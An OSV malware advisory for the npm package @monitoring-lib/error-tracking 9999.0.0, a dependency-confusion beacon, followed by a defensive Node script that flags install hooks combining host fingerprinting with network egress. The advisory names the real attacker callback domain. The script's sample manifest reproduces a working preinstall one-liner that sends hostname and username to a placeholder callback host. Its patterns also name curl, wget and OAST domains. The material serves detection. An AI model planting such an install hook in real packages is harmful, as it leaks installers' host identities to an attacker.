@monitoring-lib/error-tracking @9999.0.0
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID: MAL-2026-5540
Ecosystem: npm
Summary
On npm install, the preinstall lifecycle hook in package.json runs a Node one-liner that reads the installer's hostname (os.hostname()) and username (os.userInfo().username) and transmits them to an attacker-controlled Interactsh/OAST callback domain via two channels: an HTTPS GET request to https://d8ks495t5p5ut2enft8041g7fusnfsy5e.oast.site/?h=<hostname>&u=<username> and a DNS lookup of monitoring-lib.<hostname>.d8ks495t5p5ut2enft8041g7fusnfsy5e.oast.site. The package name uses a generic scope (@monitoring-lib) that does not correspond to a known publisher, and the version number 9999.0.0 is the canonical shape of a dependency-confusion attack, a public registry upload designed to override an organization's internal package of the same name. Combined, the package is a supply-chain recon beacon: any installer that resolves to this version leaks its host identity to the attacker, identifying victims whose private-registry configurations failed.
Source: amazon-inspector (491603ad44ed812c3d248696b00f7d4801a4c1dc23e4f23a3bb86f2ef499616d)
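The two signals the summary describes, an install-time lifecycle hook that fingerprints the host and beacons it out, and an implausibly high version number chosen to win semver resolution over an internal package, can both be caught by static triage of a package manifest before anything is installed. The following Node script is an added example, not code from the OSV record, from Amazon Inspector, or from the package itself; the indicator patterns, the version threshold and the sample manifests (including the placeholder callback domain) are constructed assumptions for illustration rather than a complete detection rule.

```javascript
// Added example: static triage of an npm package.json for the indicators
// described in the report. Indicator lists and thresholds are assumptions.

// Lifecycle hooks that npm runs automatically during `npm install`.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Assumed host-fingerprinting indicators seen in install-time beacons.
const HOST_FINGERPRINT = [/os\.hostname\s*\(/, /os\.userInfo\s*\(/, /process\.env/];

// Assumed network-egress indicators: Node network modules, fetch/curl/wget,
// and well-known out-of-band (OAST) callback domains.
const EGRESS = [
  /require\(\s*['"](?:https?|dns|net)['"]\s*\)/,
  /\bfetch\s*\(/,
  /\bcurl\b|\bwget\b/,
  /\boast\.site\b|\binteract\.sh\b|\bburpcollaborator\.net\b/,
];

// Returns one finding per install hook present in the manifest, rated by
// whether the hook both fingerprints the host and talks to the network.
function inspectScripts(manifest) {
  const findings = [];
  const scripts = (manifest && manifest.scripts) || {};
  for (const hook of INSTALL_HOOKS) {
    const body = scripts[hook];
    if (typeof body !== 'string') continue;
    const fingerprint = HOST_FINGERPRINT.filter((re) => re.test(body)).map((re) => re.source);
    const egress = EGRESS.filter((re) => re.test(body)).map((re) => re.source);
    if (fingerprint.length && egress.length) {
      findings.push({ hook, severity: 'high', reason: 'host fingerprint plus network egress in install hook', fingerprint, egress });
    } else if (egress.length) {
      findings.push({ hook, severity: 'medium', reason: 'network egress in install hook', egress });
    } else {
      findings.push({ hook, severity: 'low', reason: 'install hook present; review manually' });
    }
  }
  return findings;
}

// Dependency-confusion heuristic (assumed threshold): a major version far
// above anything a real project would publish, so the public copy outranks
// the internal one during semver resolution.
function looksLikeConfusionVersion(version, threshold = 100) {
  const m = /^(\d+)\.\d+\.\d+/.exec(version || '');
  return m !== null && Number(m[1]) >= threshold;
}

function triage(manifest) {
  return {
    name: manifest.name,
    version: manifest.version,
    suspiciousVersion: looksLikeConfusionVersion(manifest.version),
    scriptFindings: inspectScripts(manifest),
  };
}

// Constructed sample manifest modelled on the report's description. The
// scope, name and callback host are placeholders, not the report's values.
const SAMPLE_MANIFEST = {
  name: '@example-scope/internal-lib',
  version: '9999.0.0',
  scripts: {
    preinstall:
      "node -e \"const os=require('os');require('https').get('https://EXAMPLE-CALLBACK.oast.site/?h='+os.hostname()+'&u='+os.userInfo().username)\"",
  },
};

// Constructed benign manifest for comparison: no install hooks, normal version.
const BENIGN_MANIFEST = { name: 'example-util', version: '1.3.0', scripts: { test: 'node test.js' } };

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(triage(SAMPLE_MANIFEST), null, 2));
  console.log(JSON.stringify(triage(BENIGN_MANIFEST), null, 2));
}
```

Run this over every package.json in node_modules after a dry-run resolution (or over the tarballs your lock file pins) and treat a high-severity finding, or a suspicious version on a package whose scope you expect to come from an internal registry, as a block-the-merge condition; the heuristics err on the side of flagging, so low findings are meant to be reviewed, not auto-rejected.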